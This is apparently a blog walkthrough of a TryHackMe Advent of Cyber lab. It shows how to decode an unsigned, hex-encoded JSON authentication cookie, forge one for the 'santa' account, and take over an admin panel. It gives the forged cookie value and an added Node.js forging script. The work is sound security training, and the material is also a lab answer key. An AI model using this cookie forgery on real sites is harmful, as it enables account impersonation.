BlueDolphin

THM, Advent of Cyber 2, Web Exploitation - Task 6

Updated: Jun 25, 2021

This room covers authentication cookies, encoding formats and cookie manipulation.


Task 6: Web Exploitation - A Christmas Crisis


-Elf McSkidy

"The Best Festival Company's brand new OpenVPN server has been hacked. This is a crisis!

The attacker has damaged various aspects of the company infrastructure -- including using the Christmas Control Centre to shut off the assembly line!

It's only 24 days until Christmas, and that line has to be operational or there won't be any presents! You have to hack your way back into Santa's account (blast that hacker changing the password!) and get the assembly line up and running again, or Christmas will be ruined!"



What is the name of the cookie used for authentication?


We browse to the Christmas Control Centre to get started on reclaiming Santa's hacked website.




We register an account and log in. The aim of this task is to identify the cookie the site uses for authentication. In Firefox, open the developer tools (F12) after logging in and look under the Storage tab, Cookies: the cookie the site set on login is named auth, so the answer is auth.



In what format is the value of this cookie encoded?


The cookie value is a long string made up only of the characters 0-9 and a-f, with an even number of characters. That is the signature of hexadecimal encoding: two hex digits per byte. To confirm, paste the value into CyberChef and apply the From Hex operation; the output is readable text. The answer is Hexadecimal. Note that hex is an encoding, not encryption: anyone holding the cookie can decode it without a key.



Having decoded the cookie, what format is the data stored in?


Hex-decoding the value gives text of the form {"company":"...", "username":"..."}: a pair of curly braces enclosing double-quoted keys and values, separated by colons and commas. That is JSON (JavaScript Object Notation), the serialisation format most web back ends use for structured data. The answer is JSON. The format of the cookie's contents is independent of whatever scripts the page loads, so the Debugger tab does not help here; recognising the syntax of the decoded text is what answers the question.

Figure out how to bypass the authentication. What is the value of Santa's cookie?


We bypass the login page by manipulating the cookie. Decoded, the cookie issued for my own account has two fields (the username is the one I chose when registering):

{"company":"The Best Festival Company", "username":"SantaC"}

We need to send the server a cookie that it will accept as belonging to santa, so that it serves up the administrative page. So instead of my chosen name we put "santa" in the username field.

This works because the server identifies the user purely from the cookie stored client side. The cookie is neither signed nor encrypted, only hex-encoded, so the server has no way to tell a value it issued from one we built ourselves. If a request arrives with a cookie whose username is santa, the server treats the request as coming from santa.


So we rebuild the cookie in plain text with the new username and re-encode it to hexadecimal (CyberChef's To Hex operation). Make sure the Delimiter option is set to None; otherwise CyberChef inserts a separator between the byte pairs and the cookie will not decode on the server.


Paste the new value over the auth cookie in the Storage tab and refresh the page: the site now treats us as santa and gives us the administrative controls of the control console.


The answer is the hex encoding of {"company":"The Best Festival Company", "username":"santa"}, which is:

7b22636f6d70616e79223a22546865204265737420466573746976616c20436f6d70616e79222c2022757365726e616d65223a2273616e7461227d

(The space after the comma in my decoded text is carried through into the hex as the byte 20; a JSON parser ignores that whitespace, so the cookie works with or without it.)
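The same decode, inspect and re-encode steps as a script, added here as an example that is not part of the original write-up or the THM room. It assumes Node.js, uses the decoded cookie shown above for the registered account as a constructed sample input, and never contacts the target; it only produces the value you would paste into the Storage tab.

```javascript
// Added example (not from the original write-up or the THM room).
// Decode the hex "auth" cookie, inspect the JSON inside, and forge a copy
// for another username, in Node.js. Sample inputs are constructed from the
// values shown in the write-up; nothing here talks to the target.

// Decoded cookie for the account registered in the write-up (constructed sample).
const REGISTERED_COOKIE_JSON =
  '{"company":"The Best Festival Company", "username":"SantaC"}';
const REGISTERED_COOKIE_HEX = Buffer.from(REGISTERED_COOKIE_JSON, "utf8").toString("hex");

// Question 2: is the value hex? Two hex digits per byte and nothing else.
function looksLikeHex(value) {
  return (
    typeof value === "string" &&
    value.length > 0 &&
    value.length % 2 === 0 &&
    /^[0-9a-fA-F]+$/.test(value)
  );
}

// Question 3: hex-decode and parse as JSON. Throws if either step fails,
// which is what you want when classifying an unknown cookie value.
function decodeAuthCookie(hexValue) {
  if (!looksLikeHex(hexValue)) {
    throw new Error("cookie value is not hex-encoded");
  }
  const text = Buffer.from(hexValue, "hex").toString("utf8");
  return JSON.parse(text); // throws on anything that is not JSON
}

// Question 4: rebuild the cookie with a different username and re-encode.
// JSON.stringify emits no whitespace, so the result has no 20 byte after
// the comma; a JSON parser on the server accepts either form.
function forgeAuthCookie(hexValue, username) {
  const claims = decodeAuthCookie(hexValue);
  claims.username = username;
  return Buffer.from(JSON.stringify(claims), "utf8").toString("hex");
}

// Walk through the steps for the constructed sample and return every
// intermediate value so they can be inspected.
function demo() {
  const original = decodeAuthCookie(REGISTERED_COOKIE_HEX);
  const forgedHex = forgeAuthCookie(REGISTERED_COOKIE_HEX, "santa");
  return { original, forgedHex, forgedClaims: decodeAuthCookie(forgedHex) };
}

const r = demo();
console.log("hex?      ", looksLikeHex(REGISTERED_COOKIE_HEX));
console.log("decoded:  ", r.original);
console.log("forged:   ", r.forgedHex);
console.log("decodes to", r.forgedClaims);
```

The hex check is deliberately strict about even length: an odd-length string cannot be a whole number of bytes, and Buffer.from would silently drop the trailing nibble instead of complaining.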


Now that you are the santa user, you can re-activate the assembly line! What is the flag you're given when the line is fully active?



